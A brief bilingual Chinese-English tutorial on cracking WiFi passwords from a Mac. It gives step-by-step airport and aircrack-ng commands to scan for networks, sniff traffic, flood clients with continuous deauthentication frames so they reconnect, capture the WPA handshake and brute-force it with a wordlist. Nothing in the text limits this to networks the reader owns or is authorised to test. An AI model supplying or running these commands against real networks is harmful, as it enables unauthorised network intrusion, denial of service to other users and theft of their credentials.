WIFI 密码破解

1 原理

By sending a disconnect request, all devices connected to the target WIFI are disconnected. The device will reconnect and then listen for the handshake package when one of the devices establishes a connection with the WIFI, which contains the password ciphertext, and then use aircrack-ng to crack offline.

2 步骤

2.1 扫描附近 SSID

1

2

3

4

Execute the command to get the nearby SSID

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

After setting the shortcut key, it becomes:

airport -s

2.2 抓握手包

information

Aircrack-ng needs to be installed first under mac

brew install aircrack-ng

1

airport en0 sniff channel

After waiting for a while, CTRL+C ends listening

Check whether the handshake bag is caught in this package (whether it contains password information):

1

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap

Note: Because more than one WIFI signal may be used on the same channel, multiple WIFIs will be detected.

2.3 DeAuth 泛洪攻击

1

2

sudo aireplay-ng -0 0 -a WIFI physical address -c User equipment physical address wlan0mon

Parameter -0 3 means sending 3 times, and -0 0 means sending continuously. Without adding the -c parameter, it means disconnecting all clients.

2.4 破解握手密码包

1

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap -w dictionary path